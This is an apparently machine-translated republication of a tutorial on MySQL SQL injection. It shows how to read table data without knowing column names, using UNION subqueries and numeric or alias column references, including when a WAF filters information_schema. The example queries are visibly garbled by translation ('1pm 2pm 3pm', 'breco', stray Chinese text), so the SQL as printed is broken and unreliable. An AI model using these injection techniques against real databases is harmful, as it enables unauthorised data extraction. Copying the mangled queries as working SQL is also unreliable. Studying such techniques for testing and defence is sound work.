Detailed explanation of MySQL injection without knowing the list name 01/16 Update SLTechnology News&Howtos

Detailed explanation of MySQL injection without knowing the list name

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Shulou(Shulou.com)06/01 Report--

Preface

Recently, I feel empty, all in order to brush holes to dig holes, or to return to the technology itself to make myself more comfortable. All right, I won't say much next. Let's take a look at the detailed introduction.

Premise

The following situations apply to MySQL

< 5版本，或者在 MySQL >

Version = 5 [information_ schema library exists], and the library name and table name have been obtained

① can only get the table name, but can't get the column name or can only get the column name without valid content [e.g. id]

When ② wants to obtain the structure of other tables, that is, table names, column names, etc., through the tables in the information_schema library, but the library is filtered out by WAF

In fact, I feel that this method is more practical for less than version 5, because for me, I usually give up when I encounter waf (real 23333 of dishes).

Solve

Normal query:

The following is the contents of the user table in the normal query test library

Select * from user

UNION query:

Select 1, 2, 3, 4, union select * from user

Query for numeric corresponding columns:

You can use numbers to query columns, for example, 2 corresponds to the name column in the table.

Select `2` from (select 1pm 2pm 3pm 4 union select * from user) a

Alias instead of query:

When the backquotation mark `cannot be used, you can use an alias instead, such as setting the alias of 2 to b

Select b from (select 1 as 2 as breco 3 union select * from user) a

Multi-column merge query:

Ditto: if backquotation marks cannot be used here, you can also use aliases instead of

Select concat (`2`, 0x3a, `3`) from (select 1 union select 2 union select * from user) a limit 1

Only for translation and collation of ideas

Original link: https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

Summary

The above is the whole content of this article. I hope the content of this article has a certain reference and learning value for everyone's study or work. Thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.